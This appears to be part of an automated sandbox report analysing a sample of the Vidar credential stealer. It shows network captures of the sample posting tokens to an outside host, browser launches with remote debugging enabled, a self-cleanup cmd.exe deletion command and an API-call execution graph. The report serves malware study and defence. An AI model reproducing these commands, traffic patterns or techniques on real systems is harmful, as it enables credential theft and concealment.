                                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:57 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 65 63 32 76 33 37 79 35 66 75 6b 36 66 75 61 69 77 6c 6e 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 65 63 32 76 33 37 79 35 66 75 6b 36 66 75 61 69 77 6c 6e 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 65 63 32 76 33 37 79 35 66 75 6b 36 66 75 61 69 77 6c 6e 37 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------ec2v37y5fuk6fuaiwln7Content-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------ec2v37y5fuk6fuaiwln7Content-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------ec2v37y5fuk6fuaiwln7Cont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:58 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:57 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          108192.168.2.954044116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:58 UTC275OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----ycb1nophvkfuai5xb1vs
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:58 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 79 63 62 31 6e 6f 70 68 76 6b 66 75 61 69 35 78 62 31 76 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 79 63 62 31 6e 6f 70 68 76 6b 66 75 61 69 35 78 62 31 76 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 79 63 62 31 6e 6f 70 68 76 6b 66 75 61 69 35 78 62 31 76 73 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------ycb1nophvkfuai5xb1vsContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------ycb1nophvkfuai5xb1vsContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------ycb1nophvkfuai5xb1vsCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:59 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:56:59 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:56:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                          Statistics

                                                                                                                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                          Behavior

                                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                                          System Behavior

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                                                                                          Start time:09:55:03
                                                                                                                                                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\BHgwhz3lGN.exe"
                                                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                                                          File size:369'152 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:ED0FDAF80191FAD95AA5C2A7882064E2
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000003.1522441957.00000000004E1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000003.1483165863.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000003.1470034888.00000000004E4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000003.1497511197.00000000004E3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2561519655.00000000004CC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                                                                                                          Start time:09:55:14
                                                                                                                                                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff6b2cb0000
                                                                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                                                                                                                          Start time:09:55:15
                                                                                                                                                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 --field-trial-handle=2100,i,2626342174321460321,8661316679796847661,262144 /prefetch:8
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff6b2cb0000
                                                                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:8
                                                                                                                                                                                                                                                                                          Start time:09:55:28
                                                                                                                                                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff6d8030000
                                                                                                                                                                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:9
                                                                                                                                                                                                                                                                                          Start time:09:55:28
                                                                                                                                                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2428 --field-trial-handle=2272,i,10543292618471118096,2604658211909897831,262144 /prefetch:3
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff6d8030000
                                                                                                                                                                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:10
                                                                                                                                                                                                                                                                                          Start time:09:55:28
                                                                                                                                                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff6d8030000
                                                                                                                                                                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:11
                                                                                                                                                                                                                                                                                          Start time:09:55:29
                                                                                                                                                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2280 --field-trial-handle=1988,i,17298564299036040629,6959410782375951198,262144 /prefetch:3
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff6d8030000
                                                                                                                                                                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:17
                                                                                                                                                                                                                                                                                          Start time:09:55:34
                                                                                                                                                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7152 --field-trial-handle=1988,i,17298564299036040629,6959410782375951198,262144 /prefetch:8
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff6d8030000
                                                                                                                                                                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:18
                                                                                                                                                                                                                                                                                          Start time:09:55:34
                                                                                                                                                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7304 --field-trial-handle=1988,i,17298564299036040629,6959410782375951198,262144 /prefetch:8
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff6d8030000
                                                                                                                                                                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:22
                                                                                                                                                                                                                                                                                          Start time:09:56:29
                                                                                                                                                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7396 --field-trial-handle=1988,i,17298564299036040629,6959410782375951198,262144 /prefetch:8
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff6d8030000
                                                                                                                                                                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:24
                                                                                                                                                                                                                                                                                          Start time:09:56:58
                                                                                                                                                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\6xb1d" & exit
                                                                                                                                                                                                                                                                                          Imagebase:0xc50000
                                                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:25
                                                                                                                                                                                                                                                                                          Start time:09:56:58
                                                                                                                                                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff70f010000
                                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:26
                                                                                                                                                                                                                                                                                          Start time:09:56:58
                                                                                                                                                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:timeout /t 10
                                                                                                                                                                                                                                                                                          Imagebase:0xa10000
                                                                                                                                                                                                                                                                                          File size:25'088 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          Disassembly

                                                                                                                                                                                                                                                                                          Reset < >

                                                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                                                            Execution Coverage:13.7%
                                                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                            Signature Coverage:5%
                                                                                                                                                                                                                                                                                            Total number of Nodes:180
                                                                                                                                                                                                                                                                                            Total number of Limit Nodes:1
                                                                                                                                                                                                                                                                                            execution_graph 10736 423646 Process32Next 10737 42365d 10736->10737 10738 41e504 10739 41e50d RtlFreeHeap 10738->10739 10740 41e521 10739->10740 10742 42d98b GetUserNameW 10743 423348 Process32Next 10744 409d4a 10745 409d70 connect 10744->10745 10749 41edd1 GetVolumeInformationA 10750 41ee1e 10749->10750 10757 41ff59 10758 41ff84 RegQueryValueExA 10757->10758 10759 42bf5b 10760 42bf7b FindNextFileA 10759->10760 10762 409c5b socket 10766 42bd1e 10767 42bd39 FindFirstFileA 10766->10767 10769 40a09e recv 10770 4281a3 10771 4281be CreateThread 10770->10771 10773 428206 10771->10773 10774 42b95a 10771->10774 10775 42b97c 10774->10775 10776 420420 memset 10777 420464 RegOpenKeyExA 10776->10777 10778 41fe65 RegEnumKeyExA 10779 401124 10780 401145 RegOpenKeyExA 10779->10780 10782 404468 10783 404488 InternetCrackUrlA 10782->10783 10785 40450b 10783->10785 10786 409ca9 10787 409ce9 getaddrinfo 10786->10787 10790 409e2c 10791 409e47 send 10790->10791 10796 41efef GetCurrentHwProfileA 10801 41f1f3 10802 41f216 RegQueryValueExA 10801->10802 10803 41f23d 10802->10803 10804 4236f0 TerminateProcess 10805 42370e 10804->10805 10805->10805 10806 41f6b3 GetLocaleInfoA 10807 4095f3 10808 4095b6 10807->10808 10808->10807 10809 409597 InternetReadFile 10808->10809 10809->10808 10810 422b74 K32GetModuleFileNameExA 10811 422b90 10810->10811 10812 4232fa CreateToolhelp32Snapshot Process32First 10813 42daba 10814 42dac7 10813->10814 10826 42cf83 10813->10826 10832 42cee2 10813->10832 10836 42ce9c 10813->10836 10840 42c8b8 10813->10840 10863 42caf8 10813->10863 10869 42cfda 10813->10869 10875 42ce56 10813->10875 10879 42c391 GetFileAttributesA 10813->10879 10881 42cdec 10813->10881 10885 42c6c8 10813->10885 10893 42cbea 10813->10893 10827 42cfa3 10826->10827 10828 42cfb1 10827->10828 10899 422384 CreateStreamOnHGlobal 10827->10899 10900 421c6f LoadLibraryW 10827->10900 10901 4224d8 10827->10901 10833 42cef9 10832->10833 10908 42ae60 memset 10833->10908 10837 42ceb3 10836->10837 10921 42ab19 10837->10921 10841 42c8f1 10840->10841 10927 4070a7 InternetReadFile 10841->10927 10842 42c924 10847 4070a7 InternetReadFile 10842->10847 10843 42c9aa 10862 4070a7 InternetReadFile 10843->10862 10844 42ca30 10848 41f9a3 GetSystemInfo 10844->10848 10849 426f96 GlobalMemoryStatusEx 10844->10849 10850 420268 Process32Next 10844->10850 10851 41f53d GetTimeZoneInformation 10844->10851 10852 4201ff CreateToolhelp32Snapshot Process32First 10844->10852 10853 426f8c GlobalMemoryStatusEx 10844->10853 10845 42ca75 10854 415c33 8 API calls 10845->10854 10855 4153f2 26 API calls 10845->10855 10856 415814 6 API calls 10845->10856 10857 4158e9 FindFirstFileA FindNextFileA GetFileAttributesA 10845->10857 10858 415739 8 API calls 10845->10858 10859 41551c GetFileAttributesA 10845->10859 10860 415a1e GetFileAttributesA 10845->10860 10846 42cad1 10847->10843 10848->10845 10849->10845 10850->10845 10851->10845 10852->10845 10853->10845 10854->10846 10855->10846 10856->10846 10857->10846 10858->10846 10859->10846 10860->10846 10862->10844 10864 42cb2f 10863->10864 10928 4070a7 InternetReadFile 10864->10928 10865 42cb62 10867 402740 FindFirstFileA FindFirstFileA 10865->10867 10866 42cbc6 10867->10866 10870 42d011 10869->10870 10929 4070a7 InternetReadFile 10870->10929 10871 42d044 10873 4070a7 InternetReadFile 10871->10873 10872 42d11d 10873->10872 10876 42ce73 10875->10876 10930 421992 10876->10930 10880 42c3b3 10879->10880 10882 42ce09 10881->10882 10932 42967c 10882->10932 10886 42c6ee CreateDirectoryA 10885->10886 10943 42b6b8 10886->10943 10947 42b7fd 10886->10947 10888 42c7b6 10892 404f86 InternetReadFile 10888->10892 10889 42c86d 10892->10889 10894 42cc21 10893->10894 10972 4070a7 InternetReadFile 10894->10972 10895 42cd5c 10898 4290bf 13 API calls 10895->10898 10896 42cdc0 10898->10896 10902 4224ed 10901->10902 10907 406333 InternetReadFile 10902->10907 10903 4225bb CloseWindow 10905 42263c 10903->10905 10905->10828 10909 42ae9e 10908->10909 10918 42a4e5 10909->10918 10910 42af78 memset 10911 42afa9 10910->10911 10917 42a4e5 FindFirstFileA 10911->10917 10912 42b065 memset 10913 42b08c 10912->10913 10915 42a4e5 FindFirstFileA 10913->10915 10914 42b167 10915->10914 10917->10912 10919 42a51c FindFirstFileA 10918->10919 10922 42ab42 10921->10922 10925 42a4e5 FindFirstFileA 10922->10925 10923 42ac25 10926 42a4e5 FindFirstFileA 10923->10926 10924 42ac92 10925->10923 10926->10924 10931 4219a9 GetFileAttributesA 10930->10931 10933 42969a 10932->10933 10940 4291ea 10933->10940 10934 42976d 10938 4291ea FindFirstFileA 10934->10938 10935 4297c1 10939 4291ea FindFirstFileA 10935->10939 10936 429815 10938->10935 10939->10936 10941 429224 FindFirstFileA 10940->10941 10944 42b6d8 10943->10944 10951 42b2bd 10944->10951 10948 42b810 10947->10948 10967 42b180 10948->10967 10952 42b2e5 10951->10952 10958 407751 InternetConnectA 10952->10958 10959 40764d 10952->10959 10963 40785a 10952->10963 10966 407913 InternetReadFile 10952->10966 10960 40767e InternetOpenA 10959->10960 10962 4076f4 10960->10962 10964 407876 HttpSendRequestA 10963->10964 10965 4078a8 10964->10965 10968 42b1ac 10967->10968 10971 407913 InternetReadFile 10968->10971 10973 41e5ba 10974 41e5c8 RtlAllocateHeap 10973->10974 10979 42d6fe 10980 42d719 ShellExecuteExA memset 10979->10980 10982 42d877 ExitProcess 10980->10982 10983 42d89b 10982->10983 10984 42b9be 10985 42b9ca 10984->10985 10990 406333 InternetReadFile 10985->10990 10991 40658c 10985->10991 10994 405b4b 10985->10994 10992 4065a8 HttpSendRequestA 10991->10992 10995 405b70 RtlAllocateHeap 10994->10995 10997 40618e memcpy 10995->10997 10999 4061c3 memcpy 10997->10999 11001 4061ee memcpy 10999->11001 11006 42813d Sleep 11007 428160 11006->11007

                                                                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                                                                            Function 0040CCEA Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 910 40ccea-40ce20 FindFirstFileA
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?), ref: 0040CDF7
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileFindFirst
                                                                                                                                                                                                                                                                                            • String ID: $|X$j(E$lTD$lTD
                                                                                                                                                                                                                                                                                            • API String ID: 1974802433-1638559554
                                                                                                                                                                                                                                                                                            • Opcode ID: 93ba6a4fb0da29434ce8e6e354f19ad1ebedb407e9703d29a19c9622524f0e29
